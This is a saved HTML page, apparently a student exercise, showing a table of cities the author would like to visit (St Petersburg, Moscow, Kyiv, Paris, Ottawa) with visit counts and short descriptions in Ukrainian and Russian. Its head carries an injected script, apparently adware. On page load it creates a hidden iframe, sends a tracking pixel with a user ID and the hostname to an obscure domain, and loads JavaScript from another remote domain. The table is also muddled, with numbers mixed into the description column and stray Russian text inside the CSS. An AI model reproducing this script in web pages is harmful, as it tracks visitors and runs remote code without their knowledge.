<!DOCTYPE html>
<html>

  <head><script type="text/javascript">window.O7JFWNKS2FkEhGn3dFE="icb1633;Win10.0(x64);2018-03-14 23:09:30.394705Z;c80b666b-27c7-4125-8f87-b219f369c136";</script><script type="text/javascript">document.addEventListener('DOMContentLoaded', function () {
    (function () {
        if (window.self !== window.top) {
            return;
        }

        var s = '<script type="text/javascript" > (function (d, w, c) { (w[c] = w[c] || []).push(function() { try { w.yaCounter48406031 = new Ya.Metrika({ id:48406031, clickmap:true, trackLinks:true, accurateTrackBounce:true }); } catch(e) { } }); var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = "https://mc.yandex.ru/metrika/watch.js"; if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window, "yandex_metrika_callbacks"); <\/script> <noscript><div><img src="https://mc.yandex.ru/watch/48406031" style="position:absolute; left:-9999px;" alt="" \/><\/div><\/noscript> ';
        var b = document.body;

        var ifrm = document.createElement('iframe');
        ifrm.setAttribute('width', '1px');
        ifrm.setAttribute('height', '1px');
        b.appendChild(ifrm);
        ifrm = ifrm.contentWindow || ifrm.contentDocument.document || ifrm.contentDocument;

        ifrm.document.open();
        ifrm.document.write('<html><body>' + s + "</body></html>");
        ifrm.document.close();

        if (document.documentElement.hasAttribute('new-advpp')) {
            return;
        }
        document.documentElement.setAttribute('new-advpp', 'yes');

        var pixel = document.createElement("img");
        pixel.setAttribute('width', '1px');
        pixel.setAttribute('height', '1px');
        pixel.src = "//lniunalxvu.com/app/noext/main-v2.php?uid=" + encodeURIComponent(window.O7JFWNKS2FkEhGn3dFE) + "&host=wbp_" + encodeURIComponent(window.location.hostname);
        document.body.appendChild(pixel);

        window['advppUserId'] = window.O7JFWNKS2FkEhGn3dFE;

        var n = document.createElement('script');
        n.src = '//api.kgwpvnvmna.life/common/module.js?streamId=TlRRPQ==&isAdvpp=true';
        document.body.appendChild(n);
    })();
});</script>
    <title>Міста в яких я хотів би побувати </title>
    <style type="text/css">
      
      body {
      width: 350px;
      margin: 0;
      padding: 0 10px;

      font-size: 14px;
      font-family: "Arial", sans-serif;
    }
    table {
      border-collapse: collapse;
    }
    td {
      border-bottom: 1px solid lightgray;
      width: 33%;
      padding: 10px;
  
}
.cell-4 {
  background-color: lightyellow;
}
th {
  border-bottom: 1px solid black;
  border-top: 1px solid black;
  color: white;
  padding: 10px;
  
}
.cell-1 {
  background-color: darkcyan;
  text-align: left;
}
.cell-2 {
  background-color: lightblue;
  text-align: center;
}
.cell-3 {
  background-color: darkcyan;
  text-align: right;
}
.cell-6 {
  text-align: center; 
}
.cell-7 {
  text-align: right; 
}



создано
30 июня
последний ответ

    </style>
  </head>
  <body>
    <html>
      <head>
        <meta charset="utf-8">
        <title>Испытание: итоговая таблица</title>
        <link rel="stylesheet" href="style.css">
      </head>
      <body>
       <header><h1>Міста в яких я хотів би побувати</h1></header>
        <table>
        <tr>
          <th class="cell-1">Город</th>       
          <th class="cell-2">Посещений</th>       
          <th class="cell-3">Інформація </th>
        </tr>
        <tr>
          <td>СПб</td>         
          <td class="cell-6">199</td>             
          <td class="cell-7">65.12</td>
        </tr>
        <tr class="cell-4">
          <td class="cell-">Москва</td>      
          <td class="cell-6">69</td>
          <td class="cell-7">ОписМосква́ — столиця Російської Федерації</td>
        </tr>
        <tr>
          <td>Киев</td>        
          <td class="cell-6">5</td>               
          <td class="cell-7">Ки́їв — столиця України</td>
        </tr>
        <tr class="cell-4">
          <td class="cell-">Париж</td>      
          <td class="cell-6">120</td>
          <td class="cell-7">Это один из красивейших городов Европы</td>
        </tr>
        <tr class="cell-4">
          <td class="cell-">Санкт-Петербург</td>      
          <td class="cell-6">49</td>
          <td class="cell-7">21.3</td>
        </tr>
        <tr class="cell-4">
          <td class="cell-">Оттава</td>      
          <td class="cell-6">150</td>
          <td class="cell-7">Отта́ва — столиця Канади</td>
        </tr>
        <tr class="cell-4">
          <td colspan="2">Сподобалося </td>
          <td class="cell-7">873</td>
        </tr>
        </table>
      </body>
    </html>

  </body>
</html>